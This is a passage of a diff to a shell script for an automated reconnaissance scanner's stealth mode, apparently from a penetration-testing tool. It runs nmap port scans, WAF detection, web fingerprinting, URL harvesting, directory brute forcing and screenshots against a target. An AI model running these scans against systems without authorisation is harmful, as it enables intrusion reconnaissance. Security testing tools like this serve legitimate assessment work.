echo -e "$OKRED RUNNING TCP PORT SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}==================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [ "$VERBOSE" == "1" ]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN nmap -sS -T5 --open -Pn -p $DEFAULT_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml | tee $LOOT_DIR/nmap/nmap-$TARGET.txt$RESET"
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN nmap -sS --open -Pn $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml | tee $LOOT_DIR/nmap/nmap-$TARGET.txt$RESET"
|
||||
fi
|
||||
nmap -sS -T5 --open -Pn -p $DEFAULT_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml | tee $LOOT_DIR/nmap/nmap-$TARGET.txt
|
||||
|
||||
nmap -sS --open -Pn $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml | tee $LOOT_DIR/nmap/nmap-$TARGET.txt
|
||||
HOST_UP=$(cat $LOOT_DIR/nmap/nmap-$TARGET.txt $LOOT_DIR/nmap/nmap-$TARGET-*.txt 2> /dev/null | grep "host up" 2> /dev/null)
|
||||
if [ ${#HOST_UP} -ge 2 ]; then
|
||||
echo "$TARGET" >> $LOOT_DIR/nmap/livehosts-unsorted.txt 2> /dev/null
|
||||
fi
|
||||
sort -u $LOOT_DIR/nmap/livehosts-unsorted.txt 2> /dev/null > $LOOT_DIR/nmap/livehosts-sorted.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/nmap/ports-$TARGET.txt 2> /dev/null
|
||||
for PORT in `cat $LOOT_DIR/nmap/nmap-$TARGET.xml $LOOT_DIR/nmap/nmap-$TARGET-*.xml 2>/dev/null | egrep 'state="open"' | cut -d' ' -f3 | cut -d\" -f2 | sort -u | grep '[[:digit:]]'`; do
|
||||
echo "$PORT " >> $LOOT_DIR/nmap/ports-$TARGET.txt
|
||||
done
|
||||
if [ "$SLACK_NOTIFICATIONS_NMAP" == "1" ]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/nmap-$TARGET.txt"
|
||||
fi
|
||||
|
|
@ -137,87 +146,87 @@ if [ "$MODE" = "stealth" ]; then
|
|||
|
||||
if [ -z "$port_80" ];
|
||||
then
|
||||
echo -e "$OKRED + -- --=[Port 80 closed... skipping.$RESET"
|
||||
echo -e "$OKRED + -- --=[ Port 80 closed... skipping.$RESET"
|
||||
else
|
||||
echo -e "$OKORANGE + -- --=[Port 80 opened... running tests...$RESET"
|
||||
if [ "$WAFWOOF" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED CHECKING FOR WAF $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
if [ "$VERBOSE" == "1" ]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN wafw00f http://$TARGET | tee $LOOT_DIR/web/waf-$TARGET-http 2> /dev/null$RESET"
|
||||
fi
|
||||
wafw00f http://$TARGET | tee $LOOT_DIR/web/waf-$TARGET-http.raw 2> /dev/null
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/waf-$TARGET-http.raw > $LOOT_DIR/web/waf-$TARGET-http.txt 2> /dev/null
|
||||
rm -f tee $LOOT_DIR/web/waf-$TARGET-http.raw 2> /dev/null
|
||||
fi
|
||||
if [ "$WHATWEB" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED GATHERING HTTP INFO $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
if [ "$VERBOSE" == "1" ]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN whatweb -a 3 http://$TARGET | tee $LOOT_DIR/web/whatweb-$TARGET-http 2> /dev/null$RESET"
|
||||
fi
|
||||
whatweb -a 3 http://$TARGET | tee $LOOT_DIR/web/whatweb-$TARGET-http.raw 2> /dev/null
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/whatweb-$TARGET-http.raw > $LOOT_DIR/web/whatweb-$TARGET-http.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/web/whatweb-$TARGET-http.raw 2> /dev/null
|
||||
if [ "$SLACK_NOTIFICATIONS_WHATWEB" == "1" ]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/web/whatweb-$TARGET-http.txt"
|
||||
fi
|
||||
fi
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKORANGE + -- --=[ Port 80 opened... running tests...$RESET"
|
||||
echo "$TARGET" >> $LOOT_DIR/web/webhosts-unsorted.txt 2> /dev/null
|
||||
echo -e "${OKGREEN}==================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED CHECKING HTTP HEADERS AND METHODS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}==================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [ "$VERBOSE" == "1" ]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN wget -qO- -T 1 --connect-timeout=3 --read-timeout=3 --tries=1 http://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-http-$TARGET.txt 2> /dev/null$RESET"
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN curl --connect-timeout=5 --max-time 3 -I -s -R http://$TARGET | tee $LOOT_DIR/web/headers-http-$TARGET.txt 2> /dev/null$RESET"
|
||||
fi
|
||||
wget -qO- -T 1 --connect-timeout=5 --read-timeout=5 --tries=1 http://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-http-$TARGET.txt 2> /dev/null
|
||||
curl --connect-timeout 5 --max-time 5 -I -s -R http://$TARGET | tee $LOOT_DIR/web/headers-http-$TARGET.txt 2> /dev/null
|
||||
wget -qO- -T 1 --connect-timeout=5 --read-timeout=10 --tries=1 http://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-http-$TARGET.txt 2> /dev/null
|
||||
curl --connect-timeout 5 --max-time 10 -I -s -R http://$TARGET | tee $LOOT_DIR/web/headers-http-$TARGET.txt 2> /dev/null
|
||||
curl --connect-timeout 5 -s -R -L http://$TARGET > $LOOT_DIR/web/websource-http-$TARGET.txt 2> /dev/null
|
||||
curl --connect-timeout 5 --max-time 5 -I -s -R -X OPTIONS http://$TARGET | grep Allow\: | tee $LOOT_DIR/web/http_options-$TARGET-port80.txt 2> /dev/null
|
||||
if [ "$WEBTECH" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED GATHERING WEB FINGERPRINT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
webtech -u http://$TARGET | grep \- | cut -d- -f2- | tee $LOOT_DIR/web/webtech-$TARGET-http.txt
|
||||
fi
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
curl --connect-timeout 5 --max-time 10 -I -s -R -X OPTIONS http://$TARGET | grep Allow\: | tee $LOOT_DIR/web/http_options-$TARGET-port80.txt 2> /dev/null
|
||||
echo -e "${OKGREEN}==================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED DISPLAYING META GENERATOR TAGS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}==================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
cat $LOOT_DIR/web/websource-http-$TARGET.txt 2> /dev/null | grep generator | cut -d\" -f4 2> /dev/null | tee $LOOT_DIR/web/webgenerator-http-$TARGET.txt 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}==================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED DISPLAYING COMMENTS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}==================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
cat $LOOT_DIR/web/websource-http-$TARGET.txt 2> /dev/null | grep "<\!\-\-" 2> /dev/null | tee $LOOT_DIR/web/webcomments-http-$TARGET 2> /dev/null
|
||||
sed -r "s/</\&lh\;/g" $LOOT_DIR/web/webcomments-http-$TARGET 2> /dev/null > $LOOT_DIR/web/webcomments-http-$TARGET.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/web/webcomments-http-$TARGET 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}==================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED DISPLAYING SITE LINKS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}==================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
cat $LOOT_DIR/web/websource-http-$TARGET.txt 2> /dev/null | egrep "\"" | cut -d\" -f2 | grep \/ | sort -u 2> /dev/null | tee $LOOT_DIR/web/weblinks-http-$TARGET.txt 2> /dev/null
|
||||
if [ "$WAFWOOF" = "1" ]; then
|
||||
echo -e "${OKGREEN}==================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED CHECKING FOR WAF $RESET"
|
||||
echo -e "${OKGREEN}==================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
wafw00f http://$TARGET | tee $LOOT_DIR/web/waf-$TARGET-http.raw 2> /dev/null
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/waf-$TARGET-http.raw > $LOOT_DIR/web/waf-$TARGET-http.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/web/waf-$TARGET-http.raw 2> /dev/null
|
||||
echo ""
|
||||
fi
|
||||
if [ "$WHATWEB" = "1" ]; then
|
||||
echo -e "${OKGREEN}==================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED GATHERING HTTP INFO $RESET"
|
||||
echo -e "${OKGREEN}==================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
whatweb -a 3 http://$TARGET | tee $LOOT_DIR/web/whatweb-$TARGET-http.raw 2> /dev/null
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/whatweb-$TARGET-http.raw > $LOOT_DIR/web/whatweb-$TARGET-http.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/web/whatweb-$TARGET-http.raw 2> /dev/null
|
||||
fi
|
||||
if [ "$WIG" = "1" ]; then
|
||||
echo -e "${OKGREEN}==================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED GATHERING SERVER INFO $RESET"
|
||||
echo -e "${OKGREEN}==================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
python3 $PLUGINS_DIR/wig/wig.py -d -q http://$TARGET | tee $LOOT_DIR/web/wig-$TARGET-http
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/wig-$TARGET-http > $LOOT_DIR/web/wig-$TARGET-http.txt 2> /dev/null
|
||||
fi
|
||||
if [ "$WEBTECH" = "1" ]; then
|
||||
echo -e "${OKGREEN}==================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED GATHERING WEB FINGERPRINT $RESET"
|
||||
echo -e "${OKGREEN}==================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
webtech -u http://$TARGET | grep \- | cut -d- -f2- | tee $LOOT_DIR/web/webtech-$TARGET-http.txt
|
||||
fi
|
||||
if [ "$PASSIVE_SPIDER" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}==================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING PASSIVE WEB SPIDER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}==================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [ "$VERBOSE" == "1" ]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$TARGET&output=json" | jq -r .url | tee $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null$RESET"
|
||||
fi
|
||||
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$TARGET&output=json" | jq -r .url | tee $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
if [ "$WAYBACKMACHINE" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}==================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED FETCHING WAYBACK MACHINE URLS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}==================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [ "$VERBOSE" == "1" ]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN curl -sX GET "http://web.archive.org/cdx/search/cdx?url=*.$TARGET/*&output=text&fl=original&collapse=urlkey" | tee $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null$RESET"
|
||||
fi
|
||||
curl -sX GET "http://web.archive.org/cdx/search/cdx?url=*.$TARGET/*&output=text&fl=original&collapse=urlkey" | tee $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
if [ "$BLACKWIDOW" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}==================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING ACTIVE WEB SPIDER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}==================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [ "$VERBOSE" == "1" ]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN blackwidow -u http://$TARGET:80 -l 2 $RESET"
|
||||
fi
|
||||
|
|
@ -236,9 +245,9 @@ if [ "$MODE" = "stealth" ]; then
|
|||
fi
|
||||
fi
|
||||
if [ "$WEB_BRUTE_STEALTHSCAN" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}==================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}==================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [ "$VERBOSE" == "1" ]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_STEALTH -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,bak,zip,tar.gz,html,htm $RESET"
|
||||
fi
|
||||
|
|
@ -261,9 +270,9 @@ if [ "$MODE" = "stealth" ]; then
|
|||
fi
|
||||
wget http://$TARGET/robots.txt -O $LOOT_DIR/web/robots-$TARGET-http.txt 2> /dev/null
|
||||
fi
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}==================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED SAVING SCREENSHOTS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}==================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [ $CUTYCAPT = "1" ]; then
|
||||
if [ ${DISTRO} == "blackarch" ]; then
|
||||
/bin/CutyCapt --url=http://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg --insecure --max-wait=5000 2> /dev/null
|
||||
|
|
@ -276,83 +285,84 @@ if [ "$MODE" = "stealth" ]; then
|
|||
fi
|
||||
if [ $WEBSCREENSHOT = "1" ]; then
|
||||
cd $LOOT_DIR
|
||||
python $INSTALL_DIR/bin/webscreenshot.py -t 5 http://$TARGET:80
|
||||
python2 $INSTALL_DIR/bin/webscreenshot.py -t 5 http://$TARGET:80
|
||||
fi
|
||||
fi
|
||||
|
||||
if [ -z "$port_443" ];
|
||||
then
|
||||
echo -e "$OKRED + -- --=[Port 443 closed... skipping.$RESET"
|
||||
echo -e "$OKRED + -- --=[ Port 443 closed... skipping.$RESET"
|
||||
else
|
||||
echo -e "$OKORANGE + -- --=[Port 443 opened... running tests...$RESET"
|
||||
if [ $WAFWOOF == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED CHECKING FOR WAF $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
if [ "$VERBOSE" == "1" ]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN wafw00f https://$TARGET | tee $LOOT_DIR/web/waf-$TARGET-https 2> /dev/null$RESET"
|
||||
fi
|
||||
wafw00f https://$TARGET | tee $LOOT_DIR/web/waf-$TARGET-https.raw 2> /dev/null
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/waf-$TARGET-https.raw > $LOOT_DIR/web/waf-$TARGET-https.txt 2> /dev/null
|
||||
rm -f tee $LOOT_DIR/web/waf-$TARGET-https.raw 2> /dev/null
|
||||
fi
|
||||
if [ $WHATWEB == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED GATHERING HTTP INFO $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
if [ "$VERBOSE" == "1" ]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN whatweb -a 3 https://$TARGET | tee $LOOT_DIR/web/whatweb-$TARGET-https 2> /dev/null$RESET"
|
||||
fi
|
||||
whatweb -a 3 https://$TARGET | tee $LOOT_DIR/web/whatweb-$TARGET-https 2> /dev/null
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/whatweb-$TARGET-https > $LOOT_DIR/web/whatweb-$TARGET-https.txt 2> /dev/null
|
||||
if [ "$SLACK_NOTIFICATIONS_WHATWEB" == "1" ]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/web/whatweb-$TARGET-https.txt"
|
||||
fi
|
||||
fi
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKORANGE + -- --=[ Port 443 opened... running tests...$RESET"
|
||||
echo "$TARGET" >> $LOOT_DIR/web/webhosts-unsorted.txt 2> /dev/null
|
||||
echo -e "${OKGREEN}==================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED CHECKING HTTP HEADERS AND METHODS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}==================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [ "$VERBOSE" == "1" ]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN wget -qO- -T 1 --connect-timeout=3 --read-timeout=3 --tries=1 https://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-https-$TARGET.txt 2> /dev/null$RESET"
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN curl --connect-timeout=5 --max-time 3 -I -s -R https://$TARGET | tee $LOOT_DIR/web/headers-https-$TARGET.txt 2> /dev/null$RESET"
|
||||
fi
|
||||
wget -qO- -T 1 --connect-timeout=5 --read-timeout=5 --tries=1 https://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-https-$TARGET.txt 2> /dev/null
|
||||
curl --connect-timeout 5 --max-time 5 -I -s -R https://$TARGET | tee $LOOT_DIR/web/headers-https-$TARGET.txt 2> /dev/null
|
||||
wget -qO- -T 1 --connect-timeout=5 --read-timeout=10 --tries=1 https://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-https-$TARGET.txt 2> /dev/null
|
||||
curl --connect-timeout 5 --max-time 10 -I -s -R https://$TARGET | tee $LOOT_DIR/web/headers-https-$TARGET.txt 2> /dev/null
|
||||
curl --connect-timeout 5 -s -R -L https://$TARGET > $LOOT_DIR/web/websource-https-$TARGET.txt 2> /dev/null
|
||||
curl --connect-timeout 5 --max-time 5 -I -s -R -X OPTIONS https://$TARGET | grep Allow\: | tee $LOOT_DIR/web/http_options-$TARGET-port443.txt 2> /dev/null
|
||||
if [ "$WEBTECH" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED GATHERING WEB FINGERPRINT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
webtech -u https://$TARGET | grep \- | cut -d- -f2- | tee $LOOT_DIR/web/webtech-$TARGET-https.txt
|
||||
fi
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
curl --connect-timeout 5 --max-time 10 -I -s -R -X OPTIONS https://$TARGET | grep Allow\: | tee $LOOT_DIR/web/http_options-$TARGET-port443.txt 2> /dev/null
|
||||
echo -e "${OKGREEN}==================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED DISPLAYING META GENERATOR TAGS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}==================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
cat $LOOT_DIR/web/websource-https-$TARGET.txt 2> /dev/null | grep generator | cut -d\" -f4 2> /dev/null | tee $LOOT_DIR/web/webgenerator-https-$TARGET.txt 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}==================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED DISPLAYING COMMENTS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}==================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
cat $LOOT_DIR/web/websource-https-$TARGET.txt 2> /dev/null | grep "<\!\-\-" 2> /dev/null | tee $LOOT_DIR/web/webcomments-https-$TARGET 2> /dev/null
|
||||
sed -r "s/</\&lh\;/g" $LOOT_DIR/web/webcomments-https-$TARGET 2> /dev/null > $LOOT_DIR/web/webcomments-https-$TARGET.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/web/webcomments-https-$TARGET 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}==================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED DISPLAYING SITE LINKS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}==================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
cat $LOOT_DIR/web/websource-https-$TARGET.txt 2> /dev/null | egrep "\"" | cut -d\" -f2 | grep \/ | sort -u 2> /dev/null | tee $LOOT_DIR/web/weblinks-https-$TARGET.txt 2> /dev/null
|
||||
if [ "$WAFWOOF" = "1" ]; then
|
||||
echo -e "${OKGREEN}==================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED CHECKING FOR WAF $RESET"
|
||||
echo -e "${OKGREEN}==================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
wafw00f https://$TARGET | tee $LOOT_DIR/web/waf-$TARGET-https.raw 2> /dev/null
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/waf-$TARGET-https.raw > $LOOT_DIR/web/waf-$TARGET-https.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/web/waf-$TARGET-https.raw 2> /dev/null
|
||||
echo ""
|
||||
fi
|
||||
if [ "$WHATWEB" = "1" ]; then
|
||||
echo -e "${OKGREEN}==================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED GATHERING HTTP INFO $RESET"
|
||||
echo -e "${OKGREEN}==================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
whatweb -a 3 https://$TARGET | tee $LOOT_DIR/web/whatweb-$TARGET-https.raw 2> /dev/null
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/whatweb-$TARGET-https.raw > $LOOT_DIR/web/whatweb-$TARGET-https.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/web/whatweb-$TARGET-https.raw 2> /dev/null
|
||||
fi
|
||||
if [ "$WIG" = "1" ]; then
|
||||
echo -e "${OKGREEN}==================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED GATHERING SERVER INFO $RESET"
|
||||
echo -e "${OKGREEN}==================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
python3 $PLUGINS_DIR/wig/wig.py -d -q https://$TARGET | tee $LOOT_DIR/web/wig-$TARGET-https
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/wig-$TARGET-https > $LOOT_DIR/web/wig-$TARGET-https.txt 2> /dev/null
|
||||
fi
|
||||
if [ "$WEBTECH" = "1" ]; then
|
||||
echo -e "${OKGREEN}==================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED GATHERING WEB FINGERPRINT $RESET"
|
||||
echo -e "${OKGREEN}==================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
webtech -u https://$TARGET | grep \- | cut -d- -f2- | tee $LOOT_DIR/web/webtech-$TARGET-https.txt
|
||||
fi
|
||||
if [ "$PASSIVE_SPIDER" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}==================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING PASSIVE WEB SPIDER $RESET"
|
||||
